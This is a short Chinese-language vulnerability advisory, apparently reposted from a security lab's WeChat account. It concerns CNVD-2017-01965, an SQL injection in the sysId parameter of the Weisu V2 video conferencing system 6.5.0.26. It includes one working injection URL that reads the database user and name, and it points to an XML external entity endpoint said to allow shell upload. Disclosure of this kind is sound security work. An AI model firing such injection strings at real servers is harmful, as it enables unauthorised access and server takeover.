服务简介
威速V2视频会议系统是一款视频会议系统。
漏洞描述
威速V2视频会议系统sysId参数存在SQL命令执行漏洞。允许攻击者远程写入shell,获得服务器权限。
漏洞影响
北京威速科技有限公司v2视频会议系统 6.5.0.26
危害等级
高
漏洞编号
CNVD-2017-01965
环境搭建
无可复现环境
漏洞复现
sql注入点
/conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,user(),3,database(),5%23
外部实体注入点
/conf/services/ConferenceWebService?wsdl
通过构造payload数据包请求上传shell
修复方式
更新到最新版
http://www.v2tech.com/
参考连接
http://loudong.360.cn/vul/info/id/207547
https://butian.360.cn/vul/info/qid/QTVA-2017-622646
原文始发于微信公众号(CTS纵横安全实验室):威速V2视频会议系统sysId参数存在SQL命令执行漏洞CNVD-2017-01965
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论